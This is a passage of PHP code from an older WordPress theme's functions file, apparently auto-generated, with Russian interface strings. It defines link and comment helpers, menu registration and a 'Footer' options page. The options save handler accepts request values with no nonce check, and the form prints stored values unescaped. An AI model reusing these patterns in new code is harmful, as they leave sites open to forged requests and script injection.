	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
